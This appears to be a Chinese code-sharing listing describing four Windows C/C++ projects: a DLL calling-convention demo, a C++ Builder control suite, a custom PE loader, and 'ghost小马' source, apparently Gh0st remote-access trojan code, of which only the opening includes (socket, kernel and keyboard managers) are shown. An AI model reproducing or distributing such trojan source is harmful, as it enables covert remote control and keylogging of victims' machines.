- 如果通过VC++编写的DLL欲被其他语言编写的程序调用,应将函数的调用方式声明为__stdcall方式,WINAPI都采用这种方式,而C/C++缺省的调用方式却为__cdecl。这个工程为你演示了__stdcall调用的例子。-prepared by the DLL in order to be prepared in other languages procedure call, shall function call statement of the way __stdcall, WINA
- All AHM Triton Tools 2000 for C++ Builder 3 V1.3 BetaAHM 2000 提供的控件超过 150 个,其中有不少是增强型的图形控件,也有的是对 WinAPI 函数的封装,当然,也有对数据库与网络的支持。-2000 Triton Tools for C Builder V1.3 BetaAHM 2000 three of control over 150, many of which are enhanced graphics controls,
- PE-loader which I wrote in C and Assembler. Loads test dll and calls the needed function from there. Analogues of WinAPI GetProcAddress and LoadLibrary are implemented.
- ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl